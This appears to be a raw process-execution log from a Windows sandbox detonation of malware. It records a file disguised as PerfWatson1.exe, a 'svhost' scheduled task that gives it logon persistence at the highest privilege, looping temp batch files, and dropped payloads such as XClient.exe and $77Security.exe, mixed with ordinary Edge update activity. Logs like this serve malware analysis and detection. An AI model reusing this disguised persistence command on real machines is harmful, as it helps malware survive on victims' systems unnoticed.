"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6e0966a68,0x7ff6e0966a74,0x7ff6e0966a80
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Impacts.bat
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8JmbWji5E3Yw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSkv0xgggIX8.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KHOiRSC3GgYR.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\temp_16943.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16943.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REU2RkFENEQtNjM2RS00RUEzLTgxMzAtOTFEQTc4Q0JBQjIxfSIgdXNlcmlkPSJ7MzVEMjA0RkQtMjdEOC00RTk2LUE3MDItN0VEMjE5NTJEMkQ2fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9InswNUE2RUE2NS0xMzI2LTRBN0YtOUFFNS1BNjBBMzMzNUU5OEZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4xOSI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntCQzlGQTYwRC02RjQ5LTQzNkUtOEZDNS1CRkFBM0U4NTg1RjF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkwLjAuODE4LjY2IiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM3NzAzMTc3NjAzMzQwIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzI1MjcyNDM2IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMjUzMTI0ODQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcwMzgxMjMxNjYiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9mZWQ1NTgwNS0yZTg1LTQxZDgtYjRlMy00ZWY2YjVlYmY2M2E_UDE9MTc0MDAyNTUzOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1JQm1TYVRrR1RPOGo1cHQzbjR6SDU2ejNEdTNVRFpVSU91SXhORDMySzUxazZzciUyZmglMmJYV25RNW01anM4RDRiNTRoVENYSHJkcDBjVE9uS0NobSUyYjBKUSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSI0Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcwMzgyNzkzODgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2ZlZDU1ODA1LTJlODUtNDFkOC1iNGUzLTRlZjZiNWViZjYzYT9QMT0xNzQwMDI1NTM5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUlCbVNhVGtHVE84ajVwdDNuNHpINTZ6M0R1M1VEWlVJT3VJeE5EMzJLNTFrNnNyJTJmaCUyYlhXblE1bTVqczhENGI1NGhUQ1hIcmRwMGNUT25LQ2htJTJiMEpRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTc4NjA0MDg4IiB0b3RhbD0iMTc4NjA0MDg4IiBkb3dubG9hZF90aW1lX21zPSIxNjQ2NzQiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzAzODI3OTM4OCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MDUzNjY3MzE4IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3Njk3NjA5MzczIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iOTI4IiBkb3dubG9hZF90aW1lX21zPSIxNzEyODgiIGRvd25sb2FkZWQ9IjE3ODYwNDA4OCIgdG90YWw9IjE3ODYwNDA4OCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjQzOTQiLz48cGluZyBhY3RpdmU9IjEiIGE9IjIiIHI9IjIiIGFkPSI2NjE2IiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntEOTk4OTNFMC0wMkY5LTQ3MDktQUUwNi1CN0QwMzE0OTM4ODd9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuMjMiIHVwZGF0ZV9jb3VudD0iMSI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTMyNTMxMjQ4NCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3Njk3NzY2MjAzIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI4MTIxNTYxNCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2E0NzJlY2VjLWFlNjktNDQ5ZS1iN2EyLTRlODZkZmVlNThhOT9QMT0xNzQwMDI1NTQwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUpldCUyYmpnQXRucG1pWmklMmJZYXpWUVRNVEZ5SmxjRVdjbWl5Rnp3N0dpT1QxSEJ6VzhOcTB4SCUyZmtpbU1hdXAyUjM4OEhqUndyNUI1ampXSlVXWGE1a3lRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDEyODk0IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI4MTM3MjAyNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYTQ3MmVjZWMtYWU2OS00NDllLWI3YTItNGU4NmRmZWU1OGE5P1AxPTE3NDAwMjU1NDAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9SmV0JTJiamdBdG5wbWlaaSUyYllhelZRVE1URnlKbGNFV2NtaXlGenc3R2lPVDFIQnpXOE5xMHhIJTJma2ltTWF1cDJSMzg4SGpSd3I1QjVqaldKVVdYYTVreVElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNTg3OTgyMSIgdG90YWw9IjU4NDk4MTI4IiBkb3dubG9hZF90aW1lX21zPSIyNzUxNCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAxMjg5NCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTIyODEzNzIwMjUiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2E0NzJlY2VjLWFlNjktNDQ5ZS1iN2EyLTRlODZkZmVlNThhOT9QMT0xNzQwMDI1NTQwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUpldCUyYmpnQXRucG1pWmklMmJZYXpWUVRNVEZ5SmxjRVdjbWl5Rnp3N0dpT1QxSEJ6VzhOcTB4SCUyZmtpbU1hdXAyUjM4OEhqUndyNUI1ampXSlVXWGE1a3lRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iMTk5LjIzMi4yMTQuMTcyIiBjZG5fY2lkPSIzIiBjZG5fY2NjPSJHQiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iSElUIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjQzOTk0MTE2IiB0b3RhbD0iNTg0OTgxMjgiIGRvd25sb2FkX3RpbWVfbXM9IjIxNDI5OSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTIyODEzNzIwMjUiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9hNDcyZWNlYy1hZTY5LTQ0OWUtYjdhMi00ZTg2ZGZlZTU4YTk_UDE9MTc0MDAyNTU0MCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1KZXQlMmJqZ0F0bnBtaVppJTJiWWF6VlFUTVRGeUpsY0VXY21peUZ6dzdHaU9UMUhCelc4TnEweEglMmZraW1NYXVwMlIzODhIalJ3cjVCNWpqV0pVV1hhNWt5USUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyMjgxMzcyMDI1IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9hNDcyZWNlYy1hZTY5LTQ0OWUtYjdhMi00ZTg2ZGZlZTU4YTk_UDE9MTc0MDAyNTU0MCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1KZXQlMmJqZ0F0bnBtaVppJTJiWWF6VlFUTVRGeUpsY0VXY21peUZ6dzdHaU9UMUhCelc4TnEweEglMmZraW1NYXVwMlIzODhIalJ3cjVCNWpqV0pVV1hhNWt5USUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjU4NDk4MTI4IiB0b3RhbD0iNTg0OTgxMjgiIGRvd25sb2FkX3RpbWVfbXM9IjE3NTcwMyIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI4MTM3MjAyNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI5MDI3ODA1NSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTI4MjQ2NTMyMDAiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSI5MjgiIGRvd25sb2FkX3RpbWVfbXM9IjQ1ODM2MSIgZG93bmxvYWRlZD0iNTg0OTgxMjgiIHRvdGFsPSI1ODQ5ODEyOCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNTM0MDYiLz48cGluZyByPSIyIiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntBMTU4RjBDNS01OURELTRBNTUtQjI3QS0yRUNBMzlERDZGODl9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inzBSFcKmn5c.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s4jzXqOvEGfn.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIe5oHJX8Suu.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
